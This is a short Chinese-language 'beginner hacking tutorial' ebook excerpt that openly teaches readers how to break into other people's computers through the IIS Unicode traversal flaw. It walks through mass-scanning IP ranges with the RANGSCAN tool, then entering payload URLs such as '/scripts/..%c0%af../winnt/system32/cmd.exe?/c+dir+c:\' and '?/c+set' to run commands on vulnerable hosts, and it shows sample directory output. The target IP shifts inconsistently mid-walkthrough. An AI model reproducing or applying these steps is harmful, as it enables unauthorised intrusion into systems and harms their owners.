[电子书必备]网络黑客入门教程VIP免费

【电子书必备】网络黑客入门教程 由于网上很多朋友问我怎么入侵别人的机器，所以整理了一些我认为容易学的漏洞入侵方法，希望能给 初学者一些帮助，下面讲的内容很简单，高手就不用浪费时间看了，：） （1） UNICODE漏洞入侵 “Uicode漏洞”是微软 IIS的一个重大漏洞。2001年最热门漏洞之一。 第一步，运行 RANGSCAN扫描器，会出现扫描窗口，在最上面有两个 from的横框，这是让你填一段 IP范围 的。在第一个框里填入启始域（打个比方，比如你要扫 192.168.0.1至 192.168.0.255）那么你在第一个 框里就填入192.168.0.1，在 to 后面的框里填入192.168.0.255 意思就是扫 192.168.0.0至 192.168.0.255 这段范围里有 UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如： /scripts/..%c0%af../winnt/system32/cmd.exe 这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。 我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里，再按一下添加。再按“扫描”。就看 到 RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵， 很快在扫描结果框里就会显示扫到的漏洞主机 如 192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe 意思是 192.168.0.111主机有 %c0%af 漏洞， 目标有了，我们马上打开浏览器。在网址栏里输入： 100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车 意思是查看机器里 C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如： Directory of c:\ 2002-03-13 03:47p 289 default.asp 2002-02-11 03:47p 289 default.htm 2002-03-09 04:35p Documents and Settings 2002-02-11 03:47p 289 index.asp 2002-02-11 03:47p 289 index.htm 2002-05-08 05:19a Inetpub 2002-01-19 10:37p MSSQL7 2002-03-09 04:22p Program Files 2002-01-23 06:21p WINNT 4 File(s) 1,156 bytes 5 Dir(s) 2,461,421,568 bytes free ------------------------------ 的目录列表。也会碰到看不到文件的空目录。 好，我们成功看到了机器里的C盘了。 我们在浏览器里输入： 192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车 CGI Error The specified CGI application misbehaved ...